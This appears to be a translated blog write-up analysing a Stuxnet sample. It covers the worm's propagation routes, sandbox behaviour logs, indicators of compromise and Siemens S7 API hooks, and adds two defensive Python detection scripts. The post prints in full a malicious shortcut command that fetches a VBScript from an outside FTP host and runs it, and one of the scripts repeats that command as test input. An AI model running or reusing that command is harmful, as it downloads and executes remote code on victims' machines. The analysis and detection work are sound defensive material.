Today I finally downloaded a Stuxnet sample.
About Stuxnet (Wikipedia): http://zh.wikipedia.org/zh-hk/%E9%9C%87%E7%BD%91
About Stuxnet (Yahoo! News): http://hk.news.yahoo.com/article/100930/4/khmp.html
First, the test platform was Windows 7 x64 (without the patches for MS08-067, MS10-046 and MS10-061),
with the LAN cable unplugged and a 512 MB USB stick inserted (used to collect the files produced after the Stuxnet infection; it has since been written off and is probably in a landfill by now).
The dropped files were then analysed on a physical notebook.
I. Propagation routes (copied from the web, with my own additions)
1. Propagation via the Windows Shell shortcut vulnerability (MS10-046) and USB drives
USB drives are one of the main ways Worm/Stuxnet spreads. The worm creates the following files in the root directory of the removable storage device:
~WTR4132.tmp
~WTR4141.tmp
It also creates the following shortcut files, all pointing to ~WTR4141.tmp:
Copy of Shortcut to.lnk
Copy of Copy of Shortcut to.lnk
Copy of Copy of Copy of Shortcut to.lnk
Copy of Copy of Copy of Copy of Shortcut to.lnk
On a Windows system without the MS10-046 patch, merely browsing the infected drive's root directory in Explorer is enough to automatically load the malicious module ~WTR4141.tmp; ~WTR4141.tmp in turn loads ~WTR4132.tmp, and the system is infected.
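The USB indicators above (two payloads disguised as .tmp files next to a chain of nested "Copy of ... Shortcut to.lnk" shortcuts) are simple enough to check on a drive before it is browsed in Explorer. The following Python script is an added example and not part of the original post: it inspects only the root of a drive, as the write-up describes, and generalises slightly by also flagging any ~WTR####.tmp name (the digits are assumed to vary between variants) and any depth of "Copy of " nesting. The sample directory it builds is a constructed fixture with placeholder bytes, not the real files.

```python
import re
import tempfile
from pathlib import Path

# File names from the write-up: two payloads disguised as .tmp files, plus a
# chain of nested "Copy of ... Shortcut to.lnk" shortcuts in the drive root.
PAYLOAD_NAMES = {"~wtr4132.tmp", "~wtr4141.tmp"}
# Generalised shortcut pattern: "Copy of " repeated one or more times.
SHORTCUT_RE = re.compile(r"^(copy of )+shortcut to\.lnk$", re.IGNORECASE)
# Assumption: other variants may use different digits, so also flag any ~WTR####.tmp.
WTR_RE = re.compile(r"^~wtr\d{4}\.tmp$", re.IGNORECASE)


def scan_drive_root(root):
    """Inspect only the top level of `root` (the write-up says infection
    triggers on viewing the root directory) and collect matching names."""
    findings = {"payloads": [], "shortcuts": [], "other_wtr": []}
    for entry in Path(root).iterdir():
        if not entry.is_file():
            continue
        name = entry.name.lower()
        if name in PAYLOAD_NAMES:
            findings["payloads"].append(entry.name)
        elif WTR_RE.match(name):
            findings["other_wtr"].append(entry.name)
        elif SHORTCUT_RE.match(name):
            findings["shortcuts"].append(entry.name)
    for key in findings:
        findings[key].sort()
    return findings


def verdict(findings):
    """'infected' when the full pattern is present (both payloads and at least
    one shortcut), 'suspicious' for a partial match, otherwise 'clean'."""
    full_payload_pair = len(findings["payloads"]) == 2
    if full_payload_pair and findings["shortcuts"]:
        return "infected"
    if findings["payloads"] or findings["shortcuts"] or findings["other_wtr"]:
        return "suspicious"
    return "clean"


def build_sample_drive(infected=True):
    """Constructed test fixture: a temp directory that mimics a USB root.
    The files contain placeholder bytes, not the real samples."""
    d = Path(tempfile.mkdtemp(prefix="usb_root_"))
    names = ["holiday.jpg", "notes.txt"]
    if infected:
        names += [
            "~WTR4132.tmp",
            "~WTR4141.tmp",
            "Copy of Shortcut to.lnk",
            "Copy of Copy of Shortcut to.lnk",
            "Copy of Copy of Copy of Shortcut to.lnk",
            "Copy of Copy of Copy of Copy of Shortcut to.lnk",
        ]
    for name in names:
        (d / name).write_bytes(b"placeholder")
    return d


if __name__ == "__main__":
    drive = build_sample_drive()
    found = scan_drive_root(drive)
    print(verdict(found), found)
```

Run it against a real mount point by passing the drive root to scan_drive_root; a "suspicious" verdict on a partial match is deliberate, since a cleaned drive or a different variant may leave only part of the pattern behind.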
2. Propagation via MS10-061 and WBEM
The worm exploits the Windows Print Spooler vulnerability (MS10-061) to attack machines on the LAN that have "File and Printer Sharing" enabled. On a successfully compromised computer, two files are created:
%SystemDir%\winsta.exe
%SystemDir%\wbem\mof\sysnullevnt.mof
%SystemDir%\wbem\mof\sysnullevnt.mof will at some point automatically execute %SystemDir%\winsta.exe (the malware file), causing the infection.
3. Propagation via shared folders
The worm scans LAN machines for the default C$ and admin$ shares and tries to create the following file on the remote computer:
DEFRAG<random digits>.TMP
Once the file has been created, the worm remotely creates a scheduled task to launch it at a set time.
4. Propagation via MS08-067
The worm sends malicious RPC requests to remote computers vulnerable to MS08-067; once the attack succeeds it has full control of the target and infects it.


Kaspersky reports Trojan-Dropper.Win32.Stuxnet.d and Trojan-Dropper.Win32.Stuxnet.b

Other dropped files
1.lnk ---> Exploit.Win32.Agent.ee
1.exe ---> Backdoor.Win32.Hupigon.lnqy
knk.file ---> Trojan-Downloader.JS.Agent.dhd
nk.txt ---> Trojan-Downloader.JS.Agent.dhe
1.exe ---> Trojan-GameThief.Win32.OnLineGames.ukoe
jnk.txt ---> Trojan-Downloader.JS.Agent.dhc
~wtr4132.tmp behaviour analysis:
File Info

| Name | Value |
|---|---|
| Size | 517632 |
| MD5 | 74ddc49a7c121a61b8d06c03f92d0c13 |
| SHA1 | 0ccbc128dd8bf73dc7b3922fb67d26bbcdbcaa89 |
| SHA256 | 743e16b3ef4d39fc11c5e8ec890dcd29f034a6eca51be4f7fca6e23e60dbd7a1 |
| Process | Exited |
Keys Created

| Name | Last Write Time |
|---|---|
| LM\System\CurrentControlSet\Services\MRxCls | 2009.01.12 14:47:59.984 |
| LM\System\CurrentControlSet\Services\MRxCls\Enum | 2009.01.12 14:48:00.093 |
| LM\System\CurrentControlSet\Services\MRxNet | 2009.01.12 14:48:00.312 |
| LM\System\CurrentControlSet\Services\MRxNet\Enum | 2009.01.12 14:48:00.312 |
Values Created

| Name | Type | Size | Value |
|---|---|---|---|
| LM\System\CurrentControlSet\Services\MRxCls\Data | REG_BINARY | 433 | ? |
| LM\System\CurrentControlSet\Services\MRxCls\Description | REG_SZ | 14 | "MRXCLS" |
| LM\System\CurrentControlSet\Services\MRxCls\DisplayName | REG_SZ | 14 | "MRXCLS" |
| LM\System\CurrentControlSet\Services\MRxCls\Enum\0 | REG_SZ | 48 | "Root\LEGACY_MRXCLS\0000" |
| LM\System\CurrentControlSet\Services\MRxCls\Enum\Count | REG_DWORD | 4 | 0x1 |
| LM\System\CurrentControlSet\Services\MRxCls\Enum\NextInstance | REG_DWORD | 4 | 0x1 |
| LM\System\CurrentControlSet\Services\MRxCls\ErrorControl | REG_DWORD | 4 | 0x0 |
| LM\System\CurrentControlSet\Services\MRxCls\Group | REG_SZ | 16 | "Network" |
| LM\System\CurrentControlSet\Services\MRxCls\ImagePath | REG_SZ | 86 | "\??\C:\WINDOWS\system32\Drivers\mrxcls.sys" |
| LM\System\CurrentControlSet\Services\MRxCls\Start | REG_DWORD | 4 | 0x1 |
| LM\System\CurrentControlSet\Services\MRxCls\Type | REG_DWORD | 4 | 0x1 |
| LM\System\CurrentControlSet\Services\MRxNet\Description | REG_SZ | 14 | "MRXNET" |
| LM\System\CurrentControlSet\Services\MRxNet\DisplayName | REG_SZ | 14 | "MRXNET" |
| LM\System\CurrentControlSet\Services\MRxNet\Enum\0 | REG_SZ | 48 | "Root\LEGACY_MRXNET\0000" |
| LM\System\CurrentControlSet\Services\MRxNet\Enum\Count | REG_DWORD | 4 | 0x1 |
| LM\System\CurrentControlSet\Services\MRxNet\Enum\NextInstance | REG_DWORD | 4 | 0x1 |
| LM\System\CurrentControlSet\Services\MRxNet\ErrorControl | REG_DWORD | 4 | 0x0 |
| LM\System\CurrentControlSet\Services\MRxNet\Group | REG_SZ | 16 | "Network" |
| LM\System\CurrentControlSet\Services\MRxNet\ImagePath | REG_SZ | 86 | "\??\C:\WINDOWS\system32\Drivers\mrxnet.sys" |
| LM\System\CurrentControlSet\Services\MRxNet\Start | REG_DWORD | 4 | 0x1 |
| LM\System\CurrentControlSet\Services\MRxNet\Type | REG_DWORD | 4 | 0x1 |
Files Created

| Name | Size | Last Write Time | Creation Time | Last Access Time | Attr |
|---|---|---|---|---|---|
| C:\Documents and Settings\User\Local Settings\Temp\~DF1.tmp | 498176 | 2009.01.12 14:47:59.406 | 2009.01.12 14:47:59.203 | 2009.01.12 14:47:59.203 | 0x20 |
| C:\Documents and Settings\User\Local Settings\Temp\~DF2.tmp | 90 | 2009.01.12 14:47:59.406 | 2009.01.12 14:47:59.203 | 2009.01.12 14:47:59.203 | 0x20 |
| C:\Documents and Settings\User\Local Settings\Temp\~DF3.tmp | 6619 | 2009.01.12 14:47:59.625 | 2009.01.12 14:47:59.218 | 2009.01.12 14:47:59.218 | 0x20 |
| C:\WINDOWS\inf\mdmcpq3.PNF | 6619 | 2008.07.31 16:58:13.796 | 2008.07.31 16:58:13.656 | 2008.07.31 16:58:13.796 | 0x80 |
| C:\WINDOWS\inf\mdmeric3.PNF | 90 | 2008.07.31 16:58:13.796 | 2008.07.31 16:58:13.656 | 2008.07.31 16:58:13.796 | 0x80 |
| C:\WINDOWS\inf\oem7A.PNF | 498176 | 2008.07.31 16:58:13.796 | 2008.07.31 16:58:13.656 | 2008.07.31 16:58:13.796 | 0x80 |
| C:\WINDOWS\system32\drivers\mrxcls.sys | 26616 | 2007.07.27 12:00:00.000 | 2007.07.27 12:00:00.000 | 2008.08.01 06:08:41.921 | 0x80 |
| C:\WINDOWS\system32\drivers\mrxnet.sys | 17400 | 2007.07.27 12:00:00.000 | 2007.07.27 12:00:00.000 | 2008.08.01 06:08:41.921 | 0x80 |
Drivers Loaded

| Base | Size | Flags | Image Name |
|---|---|---|---|
| 0xf8a6e000 | 0x3000 | 0x9104000 | \??\C:\WINDOWS\system32\Drivers\mrxnet.sys |
| 0xf9cfc000 | 0x5000 | 0x9004000 | \??\C:\WINDOWS\system32\Drivers\mrxcls.sys |
Processes Created

| PId | Process Name | Image Name |
|---|---|---|
| 0x374 | lsass.exe | C:\WINDOWS\system32\lsass.exe |
Threads Created

| PId | Process Name | TId | Start | Start Mem | Win32 Start | Win32 Start Mem |
|---|---|---|---|---|---|---|
| 0x344 | svchost.exe | 0x170 | 0x7c810856 | MEM_IMAGE | 0x7c910760 | MEM_IMAGE |
| 0x374 | lsass.exe | 0x7a8 | 0x7c810856 | MEM_IMAGE | 0xa30690 | MEM_MAPPED |
| 0x374 | lsass.exe | 0x7bc | 0x7c810856 | MEM_IMAGE | 0x77df9981 | MEM_IMAGE |
| 0x374 | lsass.exe | 0x7cc | 0x7c810867 | MEM_IMAGE | 0x10014bd | MEM_MAPPED |
| 0x374 | lsass.exe | 0x7d0 | 0x7c810856 | MEM_IMAGE | 0x10031bc | MEM_MAPPED |
| 0x374 | lsass.exe | 0x7d8 | 0x7c810856 | MEM_IMAGE | 0xa304f2 | MEM_MAPPED |
| 0x404 | svchost.exe | 0x7b8 | 0x7c810856 | MEM_IMAGE | 0x77e76bf0 | MEM_IMAGE |
Windows Api Calls

| PId | Image Name | Address | Function ( Parameters ) | Return Value |
|---|---|---|---|---|
| 0x3ec | C:\WINDOWS\system32\lsass.exe | 0x10023ac | CreateRemoteThread(hProcess: 0x7cc, lpThreadAttributes: 0x0, dwStackSize: 0x80000, lpStartAddress: 0x7504f2, lpParameter: 0x750000, dwCreationFlags: 0x0, lpThreadId: 0x0) | 0x7a4 |
| 0x770 | C:\WINDOWS\system32\lsass.exe | 0x10023ac | CreateRemoteThread(hProcess: 0x7cc, lpThreadAttributes: 0x0, dwStackSize: 0x80000, lpStartAddress: 0x12a04f2, lpParameter: 0x12a0000, dwCreationFlags: 0x0, lpThreadId: 0x0) | 0x7a4 |
| 0x364 | C:\WINDOWS\system32\lsass.exe | 0x10023ac | CreateRemoteThread(hProcess: 0x7cc, lpThreadAttributes: 0x0, dwStackSize: 0x80000, lpStartAddress: 0x6a04f2, lpParameter: 0x6a0000, dwCreationFlags: 0x0, lpThreadId: 0x0) | 0x7a4 |
DNS Queries

| DNS Query Text |
|---|
| www.windowsupdate.com IN A + |
| www.windowsupdate.com IN A + |
Mutexes Created or Opened

| PId | Image Name | Address | Mutex Name |
|---|---|---|---|
| 0x358 | C:\TEST\sample.exe | 0x9a2199 | JCEINK |
| 0x374 | C:\WINDOWS\system32\lsass.exe | 0xd4246b | SxS_ |
| 0x374 | C:\WINDOWS\system32\lsass.exe | 0xd424b6 | Global\{62BBECCC-536F-4dc6-A387-8B1A17CF8A75} |
| 0x374 | C:\WINDOWS\system32\lsass.exe | 0xd62199 | FEEIJO |
| 0x400 | C:\WINDOWS\system32\lsass.exe | 0x8a24b6 | Global\{5EC171BB-F130-4a19-B782-B6E655E091B2} |
Events Created or Opened

| PId | Image Name | Address | Event Name |
|---|---|---|---|
| 0x358 | C:\TEST\sample.exe | 0x769c4ec2 | Global\userenv: User Profile setup event |
| 0x358 | C:\TEST\sample.exe | 0x77a89422 | Global\crypt32LogoffEvent |
| 0x358 | C:\TEST\sample.exe | 0x985e01 | Global\{CAA6BD26-6C7B-4af0-95E2-53DE46FDDF26} |
| 0x374 | C:\WINDOWS\system32\lsass.exe | 0x77a89422 | Global\crypt32LogoffEvent |
| 0x374 | C:\WINDOWS\system32\lsass.exe | 0x77de5f48 | Global\SvcctrlStartEvent_A3752DX |
| 0x374 | C:\WINDOWS\system32\lsass.exe | 0xd45da4 | Global\WkssvcShutdownEvent |
| 0x374 | C:\WINDOWS\system32\lsass.exe | 0xd45da4 | Global\WkssvcShutdownEvent2 |
| 0x374 | C:\WINDOWS\system32\lsass.exe | 0xd45e01 | Global\{CAA6BD26-6C7B-4af0-95E2-53DE46FDDF26} |
| 0x400 | C:\WINDOWS\system32\lsass.exe | 0x769c4ec2 | Global\userenv: User Profile setup event |
| 0x400 | C:\WINDOWS\system32\lsass.exe | 0x77a89410 | Global\crypt32LogoffEvent |
| 0x400 | C:\WINDOWS\system32\lsass.exe | 0x8a5e01 | Global\{CAA6BD26-6C7B-4af0-95E2-53DE46FDDF26} |
The results above show that Stuxnet installs drivers and takes control of the computer.
The worm drops the file-system filter driver mrxnet.sys, which hides the malware files at the kernel level. The purpose of this driver-level hiding is the same as that of the user-mode hiding mentioned above.
Worm/Stuxnet creates a system service for mrxnet.sys, named MRXNET, so that the driver is loaded automatically on every boot.
Mrxcls.sys injects malicious code into processes named services.exe, S7tgtopx.exe and CCProjectMgr.exe and executes it there. S7tgtopx.exe and CCProjectMgr.exe are both processes belonging to Siemens software. The injected code looks for a module named "s7otbxsx.dll" and attempts to hook the following API functions in that module:
s7_event
s7ag_bub_cycl_read_create
s7ag_bub_read_var
s7ag_bub_write_var
s7ag_link_in
s7ag_read_szl
s7ag_test
s7blk_delete
s7blk_findfirst
s7blk_findnext
s7blk_read
s7blk_write
s7db_close
s7db_open
s7ag_bub_read_var_seg
s7ag_bub_write_var_seg
There were also other lnk attacks:
Source of jpg-as02.lnk: %windir%\system32\cmd.exe /c echo open www.as02.com>>l.t&echo as02>>l.t&echo 111>>l.t&echo get nk %windir%\nk.vbs>>l.t&echo bye>>l.t&ftp -s:l.t&del l.t&start %windir%\nk.vbs&
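A one-line chain like the one above is hard to read in process-creation telemetry, so it helps to replay it: reconstruct the script that the `echo ...>>l.t` commands assemble, then read off what `ftp -s:l.t` would do with it. The following Python triage helper is an added example and not part of the original post; it uses the command line above verbatim as its sample input and assumes that ftp.exe treats the two lines after `open` as the answers to its username and password prompts. It generalises the specific case by handling any file name, any number of `get` lines and `&&`-joined chains.

```python
import re

# Command line taken verbatim from the write-up (the body of jpg-as02.lnk).
SAMPLE_CMDLINE = (
    r"%windir%\system32\cmd.exe /c echo open www.as02.com>>l.t&echo as02>>l.t"
    r"&echo 111>>l.t&echo get nk %windir%\nk.vbs>>l.t&echo bye>>l.t"
    r"&ftp -s:l.t&del l.t&start %windir%\nk.vbs&"
)

ECHO_APPEND_RE = re.compile(r"^echo\s+(?P<text>.*?)\s*>>\s*(?P<file>\S+)$", re.IGNORECASE)
FTP_SCRIPT_RE = re.compile(r"^ftp\s+.*-s:(?P<file>\S+)", re.IGNORECASE)
# ftp.exe script verbs we recognise; any other line directly after `open` is
# treated as an answer to the username/password prompt (assumption).
FTP_VERBS = {"open", "get", "mget", "put", "bye", "quit", "binary", "ascii", "cd", "lcd", "user"}


def split_cmd_chain(cmdline):
    """Drop the `cmd.exe /c` prefix and split the rest on `&` into commands."""
    m = re.search(r"cmd(?:\.exe)?\s+/c\s+(.*)$", cmdline, re.IGNORECASE)
    body = m.group(1) if m else cmdline
    return [seg.strip() for seg in body.split("&") if seg.strip()]


def decode_echo_dropper(cmdline):
    """Replay the chain: reconstruct every file built with `echo ...>>file`
    and record the remaining commands (ftp script runs, del, start, ...)."""
    files, actions = {}, []
    for seg in split_cmd_chain(cmdline):
        m = ECHO_APPEND_RE.match(seg)
        if m:
            files.setdefault(m.group("file").lower(), []).append(m.group("text"))
            continue
        m = FTP_SCRIPT_RE.match(seg)
        if m:
            actions.append(("ftp_script", m.group("file").lower()))
            continue
        parts = seg.split(None, 1)
        actions.append((parts[0].lower(), parts[1] if len(parts) > 1 else ""))
    return files, actions


def ftp_script_summary(files, actions):
    """Interpret a reconstructed ftp.exe script: server, credentials, downloads."""
    summary = {"server": None, "user": None, "password": None, "downloads": []}
    for kind, name in actions:
        if kind != "ftp_script" or name not in files:
            continue
        lines = files[name]
        i = 0
        while i < len(lines):
            parts = lines[i].split()
            verb = parts[0].lower() if parts else ""
            if verb == "open" and len(parts) > 1:
                summary["server"] = parts[1]
                # The next two non-verb lines answer the user/password prompts.
                creds = []
                while i + 1 < len(lines) and len(creds) < 2:
                    nxt = lines[i + 1].split()
                    if nxt and nxt[0].lower() in FTP_VERBS:
                        break
                    creds.append(lines[i + 1].strip())
                    i += 1
                if creds:
                    summary["user"] = creds[0]
                if len(creds) > 1:
                    summary["password"] = creds[1]
            elif verb in {"get", "mget"} and len(parts) > 1:
                remote = parts[1]
                local = parts[2] if len(parts) > 2 else remote
                summary["downloads"].append((remote, local))
            i += 1
    return summary


def is_echo_ftp_dropper(cmdline):
    """Flag the full pattern: a script is assembled with echo, fed to ftp -s:,
    and a file it downloaded is then executed with `start`."""
    files, actions = decode_echo_dropper(cmdline)
    summary = ftp_script_summary(files, actions)
    if summary["server"] is None:
        return False
    fetched = {local.lower() for _, local in summary["downloads"]}
    return any(kind == "start" and arg.strip().lower() in fetched for kind, arg in actions)


if __name__ == "__main__":
    f, a = decode_echo_dropper(SAMPLE_CMDLINE)
    print(ftp_script_summary(f, a), is_echo_ftp_dropper(SAMPLE_CMDLINE))
```

Pointed at a feed of process command lines, is_echo_ftp_dropper gives a cheap first-pass alert, and ftp_script_summary gives the analyst the server, the credentials and the dropped path without having to untangle the chain by hand.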
This malware's code is extremely complex; in some places I have no idea what it is doing, and for some of the dropped files I still couldn't tell what they do even after reading through the code....